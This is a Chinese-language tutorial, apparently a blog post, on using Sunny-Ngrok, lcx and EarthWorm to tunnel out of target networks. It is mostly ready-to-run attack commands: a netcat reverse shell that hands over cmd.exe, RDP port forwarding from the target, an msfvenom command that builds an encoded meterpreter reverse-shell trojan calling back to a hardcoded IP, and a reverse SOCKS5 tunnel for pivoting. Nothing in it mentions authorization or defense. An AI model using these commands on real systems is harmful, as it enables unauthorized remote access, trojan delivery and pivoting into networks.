Ngrok
Ngrok一个反向代理,通过在公共的端点和本地端口建立一个安全的通道,其功能可以反向代理出web服务还有端口转发,这里我们主要演示端口转发的功能
由于ngrok这个工具官网是要访问外国网站的,所以是能使用国内的Sunny-Ngrok
反弹nc shell
首先我们启动ngrok
./sunny clientid 隧道id
本地监听端口:
nc -vv -lp 9991
目标机器:
nc -vv server.ngrok.cc 33388 -e cmd.exe
这个我们使用nc本地监听ngrok转发的本地端口9001,然后目标机器请求ngrok分配的公网地址把自己的shell交给ngrok公网开放的端口,ngrok把端口再转发到我们本地建立一个隧道获取到shell。效果如下
至此已经拿到了目标机器cmd权限
ngrok结合lcx使用转发3389端口
目标机器:
lcx -slave server.ngrok.cc 33388 127.0.0.1 3389
本地指定监听:
lcx -listen 9991 33389
然后连接我们本地的33389端口:
结合msf反弹meterpreter shell
首先本地开启ngrok
设置用来反弹连接的木马
这里我们都知道配置的时候要获取到ip地址这里我们要用到NetCat这个工具
nc -vv server.ngrok.cc 33388
msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=47.90.92.56 LPORT=33388 -b “\x00”-e x86/shikata_ga_nai -f exe -o ~/桌面/win.exe
//生成反弹木马
配置好木马后,我们kali使用msf监听本地ngrok转发的9991端口,等待反弹马
msf exploit(handler) > run
目标机器运行木马
可以看到我们本地已经反弹回了meterpreter的shell
至此,感谢Double8前辈的博文。
EathWorm
EathWorm是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透,跨平台!!!
该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)
这里介绍一下反弹socks5端口转发
公网Linux上:
./ew_for_linux64 -s rcsocks -l 1080 -e 8888
目标机器上:
ew_for_Win.exe -s rssocks -d 公网ip -e 8888
显示建立隧道成功
本地使用Proxifier工具进行连接
输入目标机器ip连接3389即可
至此,我们可以清晰的看到已经可以socks代理连接目标端口了。